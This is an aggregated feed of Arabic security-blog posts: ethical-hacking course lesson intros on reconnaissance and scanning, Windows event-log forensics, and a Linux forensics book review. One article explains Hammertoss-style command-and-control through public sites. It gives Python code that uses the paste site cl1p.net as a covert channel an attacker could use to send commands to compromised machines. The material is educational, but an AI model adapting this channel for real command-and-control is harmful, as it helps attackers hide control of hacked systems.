Quantcast
Channel: iSecur1ty
Viewing all 466 articles
Browse latest View live

دورة مهارات الهاكر الأخلاقي : الدرس الاول (مقدمة عن الدورة )

$
0
0

 

نعود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد على منهجية PTES العالمية لإختبار الإختراق.

الدرس الأول من هذه الدورة سوف يتناول مُقدمة سريعة عن محتويات الدورة وكذلك بعض الأمور التي تختص بالمُختبرات وكيفية التعامل معها ، حاولنا قدر الإمكان أن تكون مجموعة الدروس الخاصة بالدورة مُبسطة والمواضيع الموجوده بها تُحاكي المستوى المُبتدئ على عكس ما كُنا نقدمه بإستمرار في iSecur1ty بإستهدافنا لفئات مُتقدمه وشرحنا لأمور تحتاج لخبرة بعض الشيء.

في كل درس سوف نقوم بإرفاق المحتويات النصية معه والتي تتضمن المواد النصية الخاصة بالفيديو ، وكذلك أي أمثلة أو أمور أخرى قد تم شرحها في داخل الدورة لكي نتأكد من أن التطبيق من قبلكم سوف يكون بالمستوى المطلوب.

يُمكنكم الإطلاع أكثر على الدورة من خلال صفتحها في مركز تدريبات iSecur1ty ، كذلك يُمكنكم الإشتراك بمزيد من الدورات القادمة من المركز من خلال زيارة هذه الصفحة.

 

 

هذه الدورة نطرحها مجاناً لكم بعد ما سجلنا الفيديوهات الخاصة بها ، وكذلك تم تسليمها بشكل مجاني لكل من حضرها مُسبقاً بشكل مُباشر.

في حال كان لديكم أي إستفسارات أو أمور تودون مُشاركتها ، يسُرنا أنا وفريق iSecur1ty بالرد عليكم من خلال التعليقات بالأسفل.

تحميل المواد النصية الخاصة بهذا الفيديو.


دورة مهارات الهاكر الأخلاقي : الدرس الثاني ( منهجيات اختبار الاختراق)

$
0
0

نعود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد علىمنهجية PTES العالمية لإختبار الإختراق.

في هذا الدرس سوف نتعرف على معنى اختبار الاختراق (penetration testing ) و على منهجيات اختبار الاختراق المستخدمه عند تنفيذ اختبار اختراق.

سوف نشرح منهجيه PTES والتي تمر بالمراحل التاليه :

  • Pre-engagement Interactions
  • Intelligence Gathering
  • Threat Modeling
  • Vulnerability Analysis
  • Exploitation
  • Post Exploitation
  • Reporting

سوف يتم شرح كل خطوة والتعرف عليها بشكل مفصل , تم القاء الضوء ايضا على منهجيات اخرى مثل OWASP , NIST OSSTMM .

 

 

مقال : تحليل جنائي رقمي لـ EVENT LOGS الخاصة بنظام ويندوز

$
0
0

في مقالات سابقة تعرفنا على اكثر من طريقة لعمل timeline للملفات والاحداث الخاصة بالدليل سواء بالطريقة التقليديه او عن طريق اداة  log2timeline اتمنى قراءة المقالات قبل البدء بقراءة هذا المقال .

في هذه المقالة سوف يتم التركيز على تحليل Windows Event Logs والتي تعتبر مصدر مهم لمعرفة الاحداث التي تحصل للنظام ويمكن ان تخبر اذا ما كان هناك احتمال هجوم على النظام . السجلات تضم كل ما يتم انشاءة نتيجه لـ auditing policy المعدة على النظام , يمكن عرض السياسات عن طريق تسغيل الامر MMC .

Auditing Policy ببساطة هي عباره عن بعض السياسات التي يمكن اعدادها في النظام لمتابعة حدث معين لتناسب احتياجات الامن في النظام .

 

 

يمكن ايضا استخدام اداة auditpol لعرض وتعديل السياسات

 

لانظمه فيستا windows event logs موجوده في المسار

 %SystemRoot%\System32\Winevt\Logs

في المسار يوجد ملف بامتداد EVTX. وهذا الامتداد الجديد بخلاف القديم EVT الذي كان لوندوز اكس بي , بالنسبة لانظمه Windows 7/2008 السجلات ليست فقط مقصوره على سجلات النظام فقط بل البرمجيات والخدمات ايضا يمكن ان يتم تسجيل احداثها فعلى سبيل المثال برنامج Symantec Endpoint ملف “Symantec Endpoint Protection Client.evtx” يحتوي على سجلات خاصة به . تصنيفات السجلات بحسب شركة Microsoft موصوفه هنا .

سوف نركز على ثلاث ملفات مهمه :

1- Application.evtx

يحتوى على سجلات احداث للبرمجيات مثل برنامج ادارة قواعد البيانات

2- System.evtx

يحتوى على سجلات خاصة بالمحاولات الناجحه والفاشلة للدخول الى النظام ايضا اضافة , حذف , تعديل ملفات او عناصر ادارة في النظام

3- Security.evtx

يحتوى على سجلات خاصة بالعناصر الخاصة بنظام التشغيل مثل  فشل في القرص الصلب او فشل في تحميل احد عناصر النظام اثناء التشغيل

 

لتحليل هذه السجلات هناك ادوات مجانيه ومفتوحه المصدر متوفره مثل Plaso engine ايضا اداة Python-evtx من تطوير Willi Ballenthin هذه الاداة لديها القدره على قراءة ملفات EVTX , الاداه لها modules كثيره منها evtxdump.py .

الصوره التاليه توضح طريقة استخدام الاداة في SIFT .

 

 

ايضا يمكن استخدام ادوات اخرى مثل Windows Event Log Parser او ايضا يمكن استخدام Event Viewer الافتراضي الخاص بوندوز , خيار اخر يمكن استخدام اداة wevtutil.exe

الصورة التاليه توضح طريقة استخدام اداة wevutil.exe لفتح واستعلام EVENT LOGS , المثال الاول لايقوم بفلتره اي شي اما المثال الثاني تم استخدام XML filter لفتره الاستعلام

 

يجب الانتباه الى ان الجهاز ليس جزء من domain لذلك الاحداث يتم تسجيلها في Security.evtx محليا ,اذا كان الجهاز  جزء من domain سوف يتم تسجيلها في domain controller .

الان سوف نلقي نظره على Audit Policy Settings لمعرفة الاحداث التي يتم تسجيلها في النظام , حتى نتمكن من قراءة السياسات يجب ان نستخرجها من ملف موجود في المسار

HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv

اداة RegRipper تمكنا من تحليل واستخراج المحتوى الخاص بالملف ولكن توجد بعض المشاكل في حالة استخدمتها مع وندوز 7 .

الباحث Teru Yamazaki قام بنشر ورقه عن البنية الخاصة بالملف الذي يحتوي على السياسات قد تكون مفيده ايضا .

الصوره التاليه توضح الاعدادات المحتمله للسياسات التي يمكن تسجيلها

 

Teru Yamazaki قام ببرمجه online tool  تمكنا من تحليل المعلومات بشكل تلقائي , يمكنك اخذ المعلومات من سجل security باستخدام اداة RegRipper ووضعها في الموقع وسوف يتم عرض النتائج .

النتائج باللغه اليابانيه ولكن يمكن استخدام مترجم جوجل .

ترجمة لمقال : DIGITAL FORENSICS – SUPERTIMELINE & EVENT LOGS

 

دورة مهارات الهاكر الأخلاقي : الدرس الثالث ( انواع اختبار الاختراق )

$
0
0

نعود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد على منهجية PTES العالمية لإختبار الإختراق.

بعد انت تعرفنا في الدرس السابق على اهم منهجيات اختبار الاختراق , نتعرف اليوم على انواع اختبار الاختراق الذي سوف تستخدمه اثناء عمل الاختبار للعملاء الخاصة بالشركة الخاصه بك او شركة الحماية التي تعمل فيها .

انواع اختبار الاختراق :

  • White box penetration testing
  • Black box penetration testing
  • Gray box penetration testing

تم شرح وتفصيل كل نقطه في الدرس , ايضا تم تقسيم عملية الاختبار بحسب الهدف الذي تقوم باختباره مثل :

  • Network penetration testing
  • wireless penetration testing
  • Web application penetration testing
  • Mobile application penetration testing
  • Physical security penetration testing


 

 

دورة مهارات الهاكر الأخلاقي : الدرس الرابع ( جمع المعلومات باستخدام Google )

$
0
0

نعود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد علىمنهجية PTES العالمية لإختبار الإختراق.

جمع المعلومات عن الهدف هي اول مرحلة من عملية اختبار الاختراق , تركز بشكل كبير على جمع اكبر عدد من المعلومات عن الهدف وهي اهم مرحلة بسبب ان المراحل اللاحقه تعتمد على المعلومات التي نجمعها في هذه المرحله .

هذه المرحلة يمكن تنفيذها بطريقتين :

1- Passive information gathering

2- Active information gathering

في هذا الدرس سوف نشرح Passive information gathering باستخدام محرك بحث جوجل ونوضيح كيفية الاستفاده من محرك بحث جوجل في جمع المعلومات .

 

 

دورة مهارات الهاكر الأخلاقي : الدرس الخامس ( جمع المعلومات بأستخدام BING واداة Harvester )

$
0
0

نعود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد علىمنهجية PTES العالمية لإختبار الإختراق.

جمع المعلومات  عن الهدف هي اول مرحلة من عملية اختبار الاختراق , تركز بشكل كبير على جمع اكبر عدد من المعلومات عن الهدف وهي اهم مرحلة بسبب ان المراحل اللاحقه تعتمد على المعلومات التي نجمعها في هذه المرحله .

هذه المرحلة يمكن تنفيذها بطريقتين :

1- Passive information gathering

2- Active information gathering

في هذا الدرس سوف نشرح Passive information gathering ونتعرف على المزيد من الطرق والأدوات بعد انت تعرفنا في الدرس السابق على كيفية استخدام جوجل لجمع المعلومات .

في هذا الدرس سوف نستخدم محرك بحث BING وكذلك اداة Harvester لجمع المعلومات .

 

 

دورة مهارات الهاكر الأخلاقي : الدرس السادس ( جمع المعلومات بأستخدام GHD و Whois )

$
0
0

نعود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد على منهجية PTES العالمية لإختبار الإختراق.

جمع المعلومات عن الهدف هي اول مرحلة من عملية اختبار الاختراق , تركز بشكل كبير على جمع اكبر عدد من المعلومات عن الهدف وهي اهم مرحلة بسبب ان المراحل اللاحقه تعتمد على المعلومات التي نجمعها في هذه المرحله .

هذه المرحلة يمكن تنفيذها بطريقتين :

1- Passive information gathering

2- Active information gathering

استكمالاً للدروس السابقة عن Passive information gathering نتعرف اليوم على طريقتين لجميع المعلومات , الاولى باستخدام Google Hacking Database والثانيه باستخدام Whois .

 

 

 

دورة مهارات الهاكر الأخلاقي : الدرس السابع ( جمع المعلومات بأستخدام موقع Netcraft )

$
0
0

نعود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد علىمنهجية PTES العالمية لإختبار الإختراق.

جمع المعلومات عن الهدف هي اول مرحلة من عملية اختبار الاختراق , تركز بشكل كبير على جمع اكبر عدد من المعلومات عن الهدف وهي اهم مرحلة بسبب ان المراحل اللاحقه تعتمد على المعلومات التي نجمعها في هذه المرحله .

هذه المرحلة يمكن تنفيذها بطريقتين :

1- Passive information gathering

2- Active information gathering

هذا يعتبر اخر درس في Passive information gathering والذي سوف نتعرف فيه عن كيفية استخدام موقع Netcraft لجمع المعلومات عن الدومين الهدف .

 

 


دورة مهارات الهاكر الأخلاقي : الدرس الثامن ( Active information gathering )

$
0
0

عود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد على منهجية PTES العالمية لإختبار الإختراق.

جمع المعلومات عن الهدف هي اول مرحلة من عملية اختبار الاختراق , تركز بشكل كبير على جمع اكبر عدد من المعلومات عن الهدف وهي اهم مرحلة بسبب ان المراحل اللاحقه تعتمد على المعلومات التي نجمعها في هذه المرحله .

هذه المرحلة يمكن تنفيذها بطريقتين :

1- Passive information gathering

2- Active information gathering

في الدروس السبعة السابقة تعلمنا العديد من الامور الخاصة بـالـ  Passive information gathering , في درس اليوم سوف نبدا اول فيديو لـ Active information gathering  .

اترككم لمشاهدة الدرس

 

 

دورة مهارات الهاكر الأخلاقي : الدرس التاسع ( Active information gathering )

$
0
0

عود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد على منهجية PTES العالمية لإختبار الإختراق.

جمع المعلومات عن الهدف هي اول مرحلة من عملية اختبار الاختراق , تركز بشكل كبير على جمع اكبر عدد من المعلومات عن الهدف وهي اهم مرحلة بسبب ان المراحل اللاحقه تعتمد على المعلومات التي نجمعها في هذه المرحله .

هذه المرحلة يمكن تنفيذها بطريقتين :

1- Passive information gathering

2- Active information gathering

كنا قد بدأنا الشرح في  Active information gathering من الدرس السابق والذي تعرفنا على اداة host وكيف يمكن استخدامها.  في درس اليوم سوف نتعرف على اداة اكثر مرونه  تدعى dig تمكنا من استخراج معلومات سيرفرات DNS .

 

 

تحليل : كيف يقوم المُخترقين بإستغلال المواقع المعروفة في التحكم بالأجهزة المخترقه وبإستخدام Python

$
0
0

في هذا المقال سوف نتعرف على طريقة عمل البرمجيه Hammertoss , ونوضح مفهوم C&C server مع اعطاء مثال عملي باستخدام لغة البرمجه بايثون .

هامرتوس هي برمجيه روسيه من ضمن أذكي البرمجيات الخبيثه التي قد تراها بسبب الطريقه اللي يعمل بها فهو علي عكس معظم البرمجيات اللي تستخدم C&C server فهي لا تتصل بـسيرفر بها بشكل مباشر ولكن تستخدم عده مواقع معروفه مثل Github وTwitter للتواصل مع مطورين البرمجيه وبهذه الطريقه تتخطى كل الحمايات ويصعب تعقبها  !

ولعدم الغوض في تفاصيل البرمجيه ,هذا فيديو لشركه FireEye تشرح الطريقه التي تعمل بها البرمجيه من هنا

الأن كما أتضح من الفيديو فأول ما تقوم به البرمجيه هو البحث في تويتر عن تغريده وضعها أصحاب البرمجيه والتي تحتوي علي علي رابط وهاش تاج كجزء من التشفيره ولكن ألم تسأل نفسك كيف يبحث في تويتر ؟

الأجابه  وهي أنك لكي ترى تغريدات شخصا ما لا يلزم أن تكون قد قمت بتسجيل الدخول الي حسابك وهذا ما أعتمدت عليه البرمجيه !

ولكن ليس فقط التغريدات بل معلوماتك أيضا فقد قمت مثلا ببرمجه سكربت من قبل لجلب معلومات أي مستخدم تويتر تستطيع أن تراه من هنا وللقرائه أكثر عن هذه البرمجيه من هنا

 

المثال السابق كان فقط لأيضاح كيف تقوم البرمجيات بأستخدام المواقع الشهيره كسيرفر C&C , والأن وبشكل سريع ماهو C&C Server ؟

C&C هو أختصار Command and Control وهو يكون كالوسيط مابين المخترق والجهاز المخترق ويستخدم في الغالب في الـBotnets فهو يكون السيرفر الذي ينفذ المخترق الأوامر من عليه

الأن سأقوم بشرح أستخدام موقع معروف أخر لتكتمل الفكره وهو موقع Cl1p

هذا الموقع يسمح لك أن تألف أي كلمه مميزه وتستخدمها في في رابط خاص به وعندك دخولك عليه تستطيع أن تكتب أي شئ وتقوم بحفظه وتبعث هذا الرابط لأي أحد أخر فعندما يفتحه يري ما كتبته في اللينك ثم يمسح مما يعني أن تستطيع أن تستخدمه نفس الكلمه مره أخري و هكذا.

الأن سأوضح كيف من الممكن أستخدام هذا الموقع كا C&C Server بلغه البايثون ( أصدار 3 )

أول شئ سأقوم بعمل داله وظيفتها توليد أسم عشوائي ليتم أستخدامه في الرابط وسيكون طول الكلمه 30 رمز

import random ,string
def rand():
	word =""
	for i in range(30):
		word += random.choice(string.ascii_letters+string.digits)
	return word

للأيضاح فقد قمت أولا بعمل متغير فارغ ومن ثم قمت بعمل حلقه أو Loop عن طريق For تقوم بأختيار رمز واحد عشوائيا من كل الحروف الأبجديه والأرقام ومن ثم تضيفه للمتغير حتي يصبح طوله 30 رمز وتنتهي

الأن نبدأ بفرز الموقع لنري كيف نستحدمه ولنفرض مثلا أن الكلمه العشوائيه هي Isecur1ty 😀 فيكون الرابط https://cl1p.net/Isecur1ty وعندما تفتحه تري الأتي :

من الواضح ان هذه فورم بسيطه تقوم بعمل بعمل طلب من نوع POST وترسله الي نفس الرابط وهذا ما يتضح عند النظر في الكود المصدري للصفحه

الأن النص الذي نكتبه يكون في الصندوق النصي النصي المسمي Content والذي محتواه يرسل في الطلب ولنقوم بأرسال طلب بنفس الطريقه في لغه البايثون سنستخدم مكتبه requests فيكون الكود الأتي :

import random ,string ,requests
def rand():
	word =""
	for i in range(30):
		word += random.choice(string.ascii_letters+string.digits)
	return word

word = rand()
link = "https://cl1p.net/"+word
a=requests.post(link,data={"content":"Test Test"})

فبعد تنفيذ الكود نفتح الرابط فنجد النتيجه :

كما نري فقد تم عرض النص مما يعني أن الكود أشتغل 😀

والأن لنكتب كود أخر ليجلب النص من الصفحه وسأستخدم فيه مكتبه re مع مكتبه requests

regex = re.compile('tent">(.*)</')
source = requests.get("https://cl1p.net/Isecur1ty").text
regex.findall(source)[0]

فتكون النتيجه :

الأن لنصعب الأمر قليلا :]

الأن سأقوم بتقسيم النص الي عده أجزاء فيكون كل جزء منهم عباره عن كلمه وكل كلمه نضعها في رابط وحدها ونقوم بترميزها علي شكل Base64 حتي نتفادي الأخطاء التي التي قد تحدث عند أرسال نص وبه فصله أو ما شابه

ولعمل هذا سنقوم بعمل دالتين داله خاصه بالأرسال وداله للأستقبال ولكن كيف سنقوم بربط الكلمات ببعضها وكل كلمه في رابط بمفردها ؟

الحل بسيط وهو أن نأتي بالكلمه العشوائيه التي سنستخدمها في الرابط ونقوم بأضافه رقم عليها مع كل كلمه في رابط فمثلا النص “Test1 Test2 Test3” يقسم كالأتي

https://cl1p.net/Isecur1ty0 --->> Test1
https://cl1p.net/Isecur1ty1 --->> Test2
https://cl1p.net/Isecur1ty2 --->> Test3
....

فتكون الدوال بالشكل الأتي :

import requests ,re ,base64 ,random ,string
def rand():
	word =""
	for i in range(30):
		word += random.choice(string.ascii_letters+string.digits)
	return word

def send(msgs):
        msgs = msgs.split(" ")
	word = rand()
	print("Today's word is",word)
	n=0
	for msg in msgs:
		word = word[:30]+str(n)
		link = "https://cl1p.net/"+word
		a=requests.post(link,data={"content":base64.b64encode(msg.encode("utf-8"))})
		print(" [ Part "+str(n)+" Sent ]")
		n +=1
	print("\nToday's key is",str(n))

def receive(word,key):
	print("Receiving..")
	regex = re.compile('tent">(.*)</')
	for i in range(key):
		word = word[:30]+str(i)
		link = "https://cl1p.net/"+word
		source = requests.get(link).text
		msg = regex.findall(source)[0]
		msg = base64.b64decode(msg.encode("utf-8"))
		msg = msg.decode("utf-8")
		print(msg, end=" ")

فلنبسط الأمور قليلا

داله rand شرحت من قبل

داله send اول شئ قمت به هو تقسيم النص الي كلمات في المتغير msgs وبعدها المتغير word وهو الكلمه العشوائيه التي سنستخدمها ومن ثم يوجد المتغير n والذي سنستخدمه في العد وسأخبركم لماذا بعد قليل والأن قمت بعمل حلقه تأخذ كل كلمه فتضيف للمتغير word المتغير n ومن ثم تضيف المتغير word بعد الاضافه للرابط في المتغير link ومن ثم الأن نرسل طلب كما شرحنا من قبل ولكن هذه المره نقوم بترميز الكلمه التي سنرسلها بترميز base64 ونضيف 1 الي المتغير n وفي النهايه بعد أنتهاء الحلقه نقوم بطباعه المتغير n علي أنه هو المفتاح وستعرفون لماذا في داله الأستقبال

الأن داله receive قمنا فيها بأخذ متغيرين وهما word و key فالمتغير الأول سيكون الكلمه التي أستخدمت في الرابط والمتغير الثاني key سيعرفنا عدد الروابط 😀 وبعدها نقوم بتجهيز الريجيكس الذي سنستخرج به النص ( للفهم أكثر أقرأ عن الـRegluar expressions ) والأن نقوم بعمل حلقه ومداها المتغير key ومن ثم نقم بنفس الخطوات كما شرحنا من قبل حتي نقوم في النهايه بطباعه النص كلمه كلمه وكل كلمه منفصله عن الأخري بمسافه

هذا كان شرح بسيط للأمر والسكربت يحتاج الكثير من التطوير ولكنك الأن تستطيع أن تخزن رساله سريه مثلا علي الموقع ومن ثم لا يستطيع أحد ومعه السكربت أن يقرأها الا لو معه الكلمه والمفتاح ^_^

ولقد قمت بتطوير هذا السكربت فجعلته سكربت لأرسال واستقبال الرسائل بسريه تستطيع أن تري الكود الكامل من هنا

والأن كما تري فقد يقوم الهاكر بأستغلال الموقع عبر أرسال أوامر عليه ويقوم الجهاز المخترق بقرائتها وتنفيذها ولكن قد يخطر علي بالك كيف سيعرف الجهاز المخترق بالكلمه والمفتاح حتي يقرأها ؟

بالنسبه للكلمه قد تكون كلمه محدده وليست كلمه عشوائيه ويقوم الجهاز المخترق بتفقد الرابط كل فتره زمنيه حتي يقوم الهاكر بكتابه أمر فيه وبالنسبه للمفتاح فمن الممكن أن يقوم الهاكر بأستخدام مفتاح ثابت دائما 😀

,والي هنا انتهي من المقال  أرجوا أن تكون قد نال أعجابكم

دورة مهارات الهاكر الأخلاقي : الدرس العاشر ( active information gathering )

$
0
0

عود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد على منهجية PTES العالمية لإختبار الإختراق.

جمع المعلومات عن الهدف هي اول مرحلة من عملية اختبار الاختراق , تركز بشكل كبير على جمع اكبر عدد من المعلومات عن الهدف وهي اهم مرحلة بسبب ان المراحل اللاحقه تعتمد على المعلومات التي نجمعها في هذه المرحله .

هذه المرحلة يمكن تنفيذها بطريقتين :

1- Passive information gathering

2- Active information gathering

نستكمل الدروس الخاصة بـ Active information gathering ونتعرف على المزيد من الادوات التي تمكنا من استخراج معلومات عن الاهداف بشكل مباشر  , في هذا الدرس سوف نتعرف على اداة Nslookup والموجوده بشكل افتراضي في كل الانظمه .

 

دورة مهارات الهاكر الأخلاقي : الدرس الحادي عشر ( ping sweep سكربت باستخدام باش )

$
0
0

 

 

نعود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد على منهجية PTES العالمية لإختبار الإختراق.

جمع المعلومات عن الهدف هي اول مرحلة من عملية اختبار الاختراق , تركز بشكل كبير على جمع اكبر عدد من المعلومات عن الهدف وهي اهم مرحلة بسبب ان المراحل اللاحقه تعتمد على المعلومات التي نجمعها في هذه المرحله .

هذه المرحلة يمكن تنفيذها بطريقتين :

1- Passive information gathering

2- Active information gathering

نستكمل الدروس الخاصة بـ Active information gathering , في هذا الدرس سوف نتعرف كيفية عمل ping في الشبكه واكتشاف الاجهزه الموجوده والمتصله بالشبكه , كذلك سوف نقوم بعمل باش سكربت يقوم باكتشاف الاجهزه عن طريق ارسال ICMP Packets لكل الاجهزه الموجوده في الشبكه .

السكربت هو مثال يوضح للمستمع ان لغات البرمجه قد تسهل عمل مختبر الاختراق بشكل كبير جدا بحيث تجعل كل شي يعمل بشكل تلقائي بدلا من تنفيذ الامور بشكل منفرد ويدوياُ.

 

 

تحميل المواد النصيه 

دورة مهارات الهاكر الأخلاقي : الدرس الثاني عشر ( Port Scanning )

$
0
0

نعود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد على منهجية PTES العالمية لإختبار الإختراق.

في هذا الدرس تناول مفاهيم مهمه جدا ويجب مختبر الاختراق ان يعرفها جيدا .

النقاط التي شُرحت في الفيديو :

  • ماهي البورتات
  •  مقدمه عن TCP وكيفية عمله
  •  Banner Grabbing لا تقلق اذا لا تعرف ماذا تعني سوف تعرف كل شي في الفيديو
  •  استخراج بعض المعلومات باستخدام netcat
  • شرح اداة Nmap وطرق فحص المنافذ في الشبكه

تم استخدام مشروع Metasploitable للتطبيق يمكن تحميله من هنا

اتمنى ان تحققوا اقصى فائده من الدرس

 

 

تحميل المواد النصيه 

كتاب : Linux Forensics للمؤلف Philip Polstra

$
0
0

قليلة هي الكتب التي تعطيك معلومات عمليه بدون الخوض في التفاصيل النظريه والتي قد لا تكون مهمه بدرجه كبيره كبدايه تعلم مجال او مهاره معينه . واحد من الكتب الرائعه التي استمتعت بقرائتها كان كتاب Linux forensics للمؤلف Philip Polstra

 

 .

الكتاب عن التحقيق الجنائي الرقمي لانظمه لينكس فقط , شرح كيفية القيام بعمليه تحقيق جنائي على جهاز يعمل بنظام لينكس . الكتاب تميز بتركيزه على كيفية تطبيق الامور على النظام وليس على كيفية تعمل هذه الامور , الكثير من الكتب تعلمك بعض الامور بعد الخوض في تفاصيل كثيره جدا قبل اعطائك التطبيق العملي لها وهذا نوعا ما لا احبذه   كبدايه تعلم شي .

الكتاب شرح كيفية القيام بعمليه تحقيق جنائي وشرح ايضا كيفة عمل شي بشكل يدوي ثم باستخدام لغه باش او بايثون بحيث هناك سكربت تقريبا لكل شي قام به . فعلى سبيل المقال كيفية جمع المعلومات اثناء عمل Live analysis بشكل يدوي وفي الاخير اعطى سكربت للقيام بذلك  بشكل تلقائي.

كل الادوات التي في الكتاب مجانيه ومفتوحه المصدر , ايضا السكربتات متوفر في موقع الكتاب  مع 10 فيديوهات لبعض المفاهيم التي يرى فيها الكاتب انه من الجيد ان يتم توضيحها بفيديو ايضا .

 

دعونا ننظر في محتوى الكتاب :

الفصل الاول : يناقش اول خطوه للبدء في عمليه تحقيق جنائي ومراحل التحقيق الجنائي ويركز على المراحل التي تخوضها انت كمحقق بحسب خبرته العمليه والتي تتلخص في الكلام مع مدير السرفر  وخطوات لا تكون على حسب معيار نظري تجده في الكثير من الكتب وانما خطوات هي الحقيقه التي يجب ان تمر بها اثناء اي عمليه تحقيق جنائي . ايضا ناقش مجموعه من الفاهيم المهمه مثل chain of custody و Standard practices and documentation  بشكل سريع .

الفصل الثاني : يركز لى تحديد اذا ما كان الجهاز تم اختراقه بالفعل او مجرد اشتباه من مدير السرفر فأحيانا يظن مدير السرفر ان السيرفر يتصرف بشكل غير معتاد او هناك شي مريب فيظن ان هناك اختراق او هجوم فيقوم بالتبليغ بشكل مباشر ويحضر المختص , في هذا الفصل ماهي الامور التي تقوم بها للتحديد ان السرفر مخترق ويجب الخوص في التحليل اكثر او مجرد اخبار مدير السرفر لا تقلق ليس هناك اي شي مُقلق .

الفصل الثالث : هذا الفصل يشرح عمليه Live analysis والتي يمكن ان تعرف القصد بها من خلال فيديو سابق قمت بشرحه من هنا . ايضا تم شرح كيفية اخذ صوره من الرام باستخدام LiME .

الفصل الرابع : يشرح كيفية اخذ صوره من النظام باستخدام ادوات مجانيه ومفتوحه المصدر والتي في الغالب موجوده في اي توزيعه امنيه مثل اداة dd و DCFLDD ايضا شرح مفاهيم Write blocker .

الفصل الخامس : في هذا الفصل يناقش الامور التي نقوم بها بعد الحصول على صوره من النظام وكيفية توصيلها بالجهاز بشكل اتوماتيكي باستخدام بايثون

الفصل السادس : في الفصل السابق شرح كيفية توصيل الصوره وفي هذا الفصل كيف نقوم بتحليل محتويات الصوره واستخراج الادله

الفصل السابق : هذا الفصل يناقش نظام الملفات ويشرح مفاهيم مهمه جدا مثل superblocks ثم عمل كل شي بشكل اتوماتيكي باستخدام بايثون

الفصل الثامن : يتناول مقدمه عن تحليل الرام للجهاز باستخدام مشروع volatility framework واستخراج المعلومات من صوره الرام مثل معلومات الشبكه ونظام الملفات وتاريخ الباش وغيرها

